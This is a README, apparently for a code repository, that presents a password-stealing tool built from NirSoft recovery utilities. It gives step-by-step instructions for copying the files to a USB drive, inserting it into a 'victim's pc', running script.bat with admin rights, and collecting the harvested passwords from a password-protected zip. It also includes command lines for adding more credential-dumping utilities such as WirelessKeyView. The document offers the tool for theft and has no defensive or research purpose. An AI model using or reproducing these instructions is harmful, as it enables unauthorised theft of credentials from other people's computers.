My name is Nakshatra Ranjan Saha. I made this programme for especially Hac*ers.
This Is A Password Stealer Programme That Steales Passwords From Users Device. You Have To Run script.bat file to start the programme. you can edit that file as you want. in this programme i used password recovery utilityes from nirsoft all password files will be saved as a zip file in text folder. the file will be password protected. the password of the file is the name of the zip file(withou .zip).
installation is very easy. just clone the repo and extract that zip file.
git clone
Directly Download The Zip File By Clicking Here
Directly Download The Self Extractor File By Clicking Here
You can use it to steale passwords from a pc. just copy all files in a usb thumb drive. then insert that in victim's pc, the run script.bat. Now it will ask for admin permission. click yes. ALL DONE! You successfully Stealed The passwords. now just extract the file that have the password file in the text folder. the password of the zip file is the name of the zip file(withou .zip). remmember that the file saves with the current time of the execution. so all the passwords of the zip file will be unique
You Can Download Similar Nirsoft Utilities From Here And put the exe file(will be given in the zip file downloaded from nirsoft) In the exe folder and add path to script.bat like this
start exe\WirelessKeyView.exe /stext text\WirelessKeyView.txt
start exe\Wul.exe /stext text\Wul.txt